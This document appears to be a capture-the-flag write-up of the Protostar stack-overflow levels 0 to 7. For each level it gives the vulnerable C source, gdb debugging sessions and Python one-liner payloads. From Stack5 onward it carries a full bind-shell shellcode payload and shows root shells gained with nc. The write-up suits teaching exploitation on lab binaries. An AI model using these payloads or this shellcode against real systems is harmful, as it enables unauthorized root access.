Protostar Stack Write Up

  • Protostar Stack0
  • Protostar Stack1
  • Protostar Stack2
  • Protostar Stack3
  • Protostar Stack4
  • Protostar Stack5
  • Protostar Stack6
  • Protostar Stack7
  • Summary

Protostar Stack0

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}

Approach: overflow buffer to change the value of modified

$ echo `python -c "print 'A'*68"` | /opt/protostar/bin/stack0
you have changed the 'modified' variable

Protostar Stack1

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  if(argc == 1) {
      errx(1, "please specify an argument\n");
  }

  modified = 0;
  strcpy(buffer, argv[1]);

  if(modified == 0x61626364) {
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
}

Approach: overflow buffer to set modified to 0x61626364

$ /opt/protostar/bin/stack1 `python -c "print 'A'*64+'\x64\x63\x62\x61'"`
you have correctly got the variable to the right value

Protostar Stack2

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];
  char *variable;

  variable = getenv("GREENIE");

  if(variable == NULL) {
      errx(1, "please set the GREENIE environment variable\n");
  }

  modified = 0;

  strcpy(buffer, variable);

  if(modified == 0x0d0a0d0a) {
      printf("you have correctly modified the variable\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }

}

Approach: overflow buffer to set modified to 0x0d0a0d0a. Since buffer is copied from the GREENIE environment variable, just set that variable.

$ export GREENIE=`python -c "print 'A'*64+'\x0a\x0d\x0a\x0d'"`
$ ./stack2 
you have correctly modified the variable

This is the result on my local Ubuntu 16.04 machine.

But inside the Protostar VM it fails:

$ export GREENIE=`python -c "print 'A'*64+'\x0a\x0d\x0a\x0d'"`
: bad variable name

It won't let me set a variable like that.

Not convinced, let me try a script:

import os

# set GREENIE directly in this process's environment, so the bytes never pass through the shell
os.environ['GREENIE'] = 'A'*64+'\x0a\x0d\x0a\x0d'
os.system('./stack2')

$ python se.py 
you have correctly modified the variable

OK

Protostar Stack3

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  volatile int (*fp)();
  char buffer[64];

  fp = 0;

  gets(buffer);

  if(fp) {
      printf("calling function pointer, jumping to 0x%08x\n", fp);
      fp();
  }
}

Approach: check the security mitigations

$ checksec stack3 
[*] '/home/jc/pwn/stack3'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

Nothing is enabled, so we only need to disassemble the binary to find win()'s address and overflow buffer into fp.

$ gdb -q stack3
Reading symbols from stack3...done.
gdb-peda$ disassemble win
Dump of assembler code for function win:
   0x08048424 <+0>: push   ebp
   0x08048425 <+1>: mov    ebp,esp
   0x08048427 <+3>: sub    esp,0x18
   0x0804842a <+6>: mov    DWORD PTR [esp],0x8048540
   0x08048431 <+13>:    call   0x8048360 <puts@plt>
   0x08048436 <+18>:    leave  
   0x08048437 <+19>:    ret    
End of assembler dump.

win() is at 0x08048424; build the payload and pass the level.

$ echo `python -c "print 'A'*64+'\x24\x84\x04\x08'"` | /opt/protostar/bin/stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed

Protostar Stack4

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}

The code is really concise!
Approach: overflow buffer to crash the program, find the offset at which the return address (eip) gets overwritten, and put win()'s address there.

$ gdb -q stack4
Reading symbols from stack4...done.
gdb-peda$ pattern_create 138
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAA'
gdb-peda$ r
Starting program: /home/jc/pwn/stack4 
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAA

Program received signal SIGSEGV, Segmentation fault.
EIP: 0x41344141 ('AA4A')
gdb-peda$ pattern_offset AA4A
AA4A found at offset: 76

The offset that overwrites eip is 76.

gdb-peda$ p win
$3 = {void (void)} 0x80483f4 <win>

win() is at 0x80483f4.

$ echo `python -c "print 'A'*76+'\xf4\x83\x04\x08'"` | /opt/protostar/bin/stack4
code flow successfully changed
Segmentation fault

Protostar Stack5

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}

Approach: check the security mitigations

$ checksec stack5
[*] '/home/jc/pwn/stack5'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

Nothing is enabled, so we should be able to control eip and execute shellcode. I found a shell_bind_tcp shellcode, 89 bytes, listening on port 1337.

Generate a 200-byte test string

$ gdb -q stack5
Reading symbols from stack5...done.
gdb-peda$ pattern_create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'

Run it

gdb-peda$ r
Starting program: /home/jc/pwn/stack5 
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
ESP: 0xffffcec0 ("AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
EIP: 0x41344141 ('AA4A')

eip crashes at 0x41344141 ('AA4A')

gdb-peda$ pattern_offset AA4A
AA4A found at offset: 76

The offset is 76.

At this point esp is 0xffffcec0, which is also the address we will point eip at; its contents are

AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA

That is 120 bytes, enough to hold the 89-byte shellcode with room for a run of nop instructions in front of it. Build the payload: 'A'*76 + shellcode address + shellcode

echo `python -c "print 'A'*76+'\xc0\xce\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack5
Segmentation fault (core dumped)

Segmentation fault! Look at the core file

gdb -q stack5 core
Reading symbols from stack5...done.
[New LWP 17461]
Core was generated by `./stack5'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0xffffceff in ?? ()

Look at the memory around 0xffffceff

gdb-peda$ x/20b 0xffffceff
0xffffceff: 0xff    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffcf07: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffcf0f: 0x90    0x6a    0x66    0x58

Our shellcode actually starts at 0xffffcf00, not 0xffffcec0; fix the payload

echo `python -c "print 'A'*76+'\x00\xcf\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack5
Segmentation fault (core dumped)

Still a segmentation fault! Check the core again

$ gdb -q stack5 core
Reading symbols from stack5...done.
[New LWP 17571]
Core was generated by `./stack5'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x90ffffcf in ?? ()

Check the nearby memory

gdb-peda$ x/20b 0xffffcf00
0xffffcf00: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffcf08: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x6a
0xffffcf10: 0x66    0x58    0x6a    0x1
gdb-peda$ x/20b 0xffffcef8
0xffffcef8: 0x41    0x41    0x41    0x41    0xcf    0xff    0xff    0x90
0xffffcf00: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffcf08: 0x90    0x90    0x90    0x90

The \x00 byte of the return address we set, 0xffffcf00, is missing from memory. Got it: a \x00 byte can't be sent! But I put 16 bytes of nop in front, so shifting the return address forward by anywhere from 1 to 16 bytes should all work, right? Shift it by one: change the return address to 0xffffcf01

echo `python -c "print 'A'*76+'\x01\xcf\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack5
$ nc localhost 1337
whoami
jc

Success!

In the Protostar VM, esp is 0xbffffcc0

$ echo `python -c "print 'A'*76+'\xc0\xfc\xff\xbf'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | /opt/protostar/bin/stack5
$ nc protostar 1337
whoami
root

In the Protostar VM I did not run into the mismatch between esp under gdb and esp when running directly.

Protostar Stack6

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void getpath()
{
  char buffer[64];
  unsigned int ret;

  printf("input path please: "); fflush(stdout);

  gets(buffer);

  ret = __builtin_return_address(0);

  if((ret & 0xbf000000) == 0xbf000000) {
      printf("bzzzt (%p)\n", ret);
      _exit(1);
  }

  printf("got path %s\n", buffer);
}

int main(int argc, char **argv)
{
  getpath();



}

The return address is restricted: it may not point into the part of the stack we control.
Approach: the restriction only stops getpath()'s return address from pointing directly at the shellcode. We can instead redirect execution to the address of getpath's own ret instruction; if the shellcode address is sitting at the top of the stack at that moment, the second ret pops it and the check is bypassed.

$ gdb -q stack6
Reading symbols from stack6...done.
gdb-peda$ pattern_create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
gdb-peda$ r
Starting program: /home/jc/pwn/stack6 
input path please: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
got path AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAJAAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
ESP: 0xffffceb0 ("fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
EIP: 0x41414a41 ('AJAA')
gdb-peda$ pattern_offset AJAA
AJAA found at offset: 80

This time getpath()'s return address is at offset 80.

gdb-peda$ x/s $esp
0xffffceb0: "fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"
gdb-peda$ pattern_offset fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA found at offset: 84

The stack pointer is 0xffffceb0, at offset 84.

Build the payload: 'A'*80 + address of the ret instruction + the address that ret returns to (shellcode address, esp+4) + shellcode

$ echo `python -c "print 'A'*80+'\xf9\x84\x04\x08'+'\xb4\xce\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA����������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
                    h//shh/bin��A��̀
Segmentation fault (core dumped)

Segmentation fault! Look at the core file

$ gdb -q stack6 core
Reading symbols from stack6...done.
[New LWP 14242]
Core was generated by `./stack6'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0xffffcebd in ?? ()

Check the memory nearby

gdb-peda$ x/100b 0xffffce78
0xffffce78: 0x00    0x70    0xfb    0xf7    0x41    0x41    0x41    0x41
0xffffce80: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffce88: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffce90: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffce98: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffcea0: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffcea8: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffceb0: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffceb8: 0x41    0x41    0x41    0x41    0xf9    0x84    0x04    0x08
0xffffcec0: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffcec8: 0x41    0x41    0x41    0x41    0xf9    0x84    0x04    0x08
0xffffced0: 0xb4    0xce    0xff    0xff    0x90    0x90    0x90    0x90
0xffffced8: 0x90    0x90    0x90    0x90
gdb-peda$ p $esp
$2 = (void *) 0xffffced4

Found the problem: our second return address should be 0xffffced4, not 0xffffceb4.

Also, after 64 consecutive A's, 4 of them have been replaced. I don't understand this one; if a passing friend knows, please enlighten me.

Fix the payload

$ echo `python -c "print 'A'*80+'\xf9\x84\x04\x08'+'\xd4\xce\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA����������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
                    h//shh/bin��A��̀
$ nc localhost 1337
whoami
jc

The above is what I worked out on my local Ubuntu machine. On the Protostar VM, the stack pointer address likewise needs another 32 bytes added. The esp obtained is 0xbffffd20; +4 would give 0xbffffd24, but adding a further 32 bytes to get 0xbffffd44 is the correct answer.

$ echo `python -c "print 'A'*80+'\xf9\x84\x04\x08'+'\x44\xfd\xff\xbf'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | /opt/protostar/bin/stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA��D�������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
                    h//shh/bin��A��̀
$ nc protostar 1337
whoami
root

I tried running the payload inside gdb and found that inside gdb the extra 32 bytes are not needed. Is this a difference between gdb and running directly on the system?

Protostar Stack7

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

char *getpath()
{
  char buffer[64];
  unsigned int ret;

  printf("input path please: "); fflush(stdout);

  gets(buffer);

  ret = __builtin_return_address(0);

  if((ret & 0xb0000000) == 0xb0000000) {
      printf("bzzzt (%p)\n", ret);
      _exit(1);
  }

  printf("got path %s\n", buffer);
  return strdup(buffer);
}

int main(int argc, char **argv)
{
  getpath();



}

Approach: the same solution as stack6
Address of the ret instruction: 0x08048544
Start address of the shellcode: 0xbffffcd4

$ echo `python -c "print 'A'*80+'\x44\x85\x04\x08'+'\xd4\xfc\xff\xbf'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | /opt/protostar/bin/stack7
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD�AAAAAAAAAAAAD���������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
                    h//shh/bin��A��̀
$ nc protostar 1337
whoami
root

Summary

Failure isn't frightening; what's frightening is not finding out why you failed.
